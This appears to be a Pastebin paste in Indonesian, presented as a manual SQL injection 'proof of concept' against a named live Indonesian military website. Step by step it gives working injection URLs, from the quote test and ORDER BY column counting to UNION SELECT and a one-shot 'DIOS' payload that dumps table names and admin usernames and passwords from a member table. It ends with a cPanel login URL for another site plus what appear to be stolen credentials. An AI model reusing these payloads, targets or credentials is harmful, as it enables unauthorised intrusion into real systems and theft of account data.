Need a unique gift idea?
A Pastebin account makes a great Christmas gift
SHARE
TWEET

[POC] SQLi Manual

Berandal666 Apr 30th, 2017 608 Never
Upgrade to PRO!
ENDING IN00days00hours00mins00secs
 
  1. /---------------------------------------------------------------------------------------
  2. / ________  __      __.____         _________________   ____ ___  _____  ________    
  3. / \_____  \/  \    /  \    |       /   _____/\_____  \ |    |   \/  _  \ \______ \  
  4. /  /   |   \   \/\/   /    |       \_____  \  /  / \  \|    |   /  /_\  \ |    |  \  
  5. / /    |    \        /|    |___    /        \/   \_/.  \    |  /    |    \|   -`   \
  6. / \_______  /\__/\  / |_______ \  /_______  /\_____\ \_/______/\____|__  /_______  /
  7. /         \/      \/          \/          \/        \__>               \/        \/  
  8. /---------------------------------------------------------------------------------------
  9. /   Target      :   https://pusdikarhanud.mil.id/
  10. /   Exploiter   :   Berandal | OWL SQUAD
  11. /---------------------------------------------------------------------------------------
  12. Live Target :
  13. https://pusdikarhanud.mil.id/index.php?artikel=346
  14. =============================
  15. Pertama kita cari vuln Sqlinya dlu contoh:
  16. https://pusdikarhanud.mil.id/index.php?artikel=346
  17.  
  18. Klo kita kasih tanda petik (')
  19. Nanti akan error pagenya atau halaman pathnya jadi seperti ini
  20.  
  21. https://pusdikarhanud.mil.id/index.php?artikel=346' <----
  22.  
  23. Ngerti kan??
  24. Next step kita lakukan Order by sampai ketemu page yg error tapi sebelumnya kita kasih (order+by+1) dulu, bila pagenya kembali semula berarti bisa di katakan vuln contoh:
  25.  
  26. https://pusdikarhanud.mil.id/index.php?artikel=346'order+by+1--+ (jangan  lupa tambah kan kode '--+' di belakang order by nya)
  27.  
  28. Liat? Sudah kembali semula pagenya, berarti vuln. Step selanjutnya cari order by nya sampai dapet query yg error contoh
  29.  
  30. https://pusdikarhanud.mil.id/index.php?artikel=346'order+by+1--+
  31. https://pusdikarhanud.mil.id/index.php?artikel=346'order+by+2--+
  32. https://pusdikarhanud.mil.id/index.php?artikel=346'order+by+3--+
  33.  
  34. Dan seterusnya sampai dapet query yg error :3
  35. Di target gw query yg error berhenti di angka 11 contoh:
  36.  
  37. https://pusdikarhanud.mil.id/index.php?artikel=346'%20order+by+11--+
  38.  
  39. Kalian bisa liat di saat kita tambahkan angka 11 dia error, kesimpulannya kita akan gunakan angka yg tidak error berarti angka 10 yg bakal kita pakai buat union select all contoh :
  40.  
  41. https://pusdikarhanud.mil.id/index.php?artikel=-346'%20union+select+all+1,2,3,4,5,6,7,8,9,10--+
  42.  
  43. Seperti itu jadinya, oh iya sebelum kita union select all, jangan lupa kasih tanda (-) di depan (=) liat di atas, habis tuh keliatan tuh angka togelnya kata orang wkwkwk :v
  44. Langsung aja kita dios madblood namanya, klo di hackbar biasa gk ada, tapi klo di hackbar mod ada :3
  45. Contoh:
  46.  
  47. https://pusdikarhanud.mil.id/index.php?artikel=346'%20union+select+all+1,2,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5,6,7,8,9,10--+
  48.  
  49. Nah, pasti kalian bingung di mana tempat diosnya ya wkwk :3
  50. Gw kasih tau tempat diosnya adalah di angka togel tadi, bisa kalian liat di link sebelumnya saat kita union select all angka togel yaitu '3', jadi klo PC user bisa hapus angka '3' nya lalu exploit dios madblood, begitu pun ANDRO user :)
  51. Klo udah keliatan username & password adminnya mari lanjut :3
  52. Contoh:
  53.  
  54.  https://pusdikarhanud.mil.id/index.php?artikel=-346'%20union+select+all+1,2,(Select+export_set(5,@:=0,(select+count(*)from(member)where@:=export_set(5,export_set(5,@,nrp,0x3c6c693e,2),pass,0xa3a,2)),@,2)),4,5,6,7,8,9,10--+
  55.  
  56. Taraaa keliatan username & password adminnya, oke gw jelasin caranya kalian tinggal ubah
  57.  
  58. (Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
  59.  
  60. Information_schema.columns = member, atau sesuai dios yg muncul nanti
  61. Table_name = nrp
  62. Column_name = pass
  63. Itu semua sesuai dengan dios yg muncul ya kawan kawan :)
  64.  
  65. Tinggal crack aja deh username & passwordnya :3
  66.  
  67. http://tpid-balam.com/cpanel
  68. username (k5707488) password (berandal2301)
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top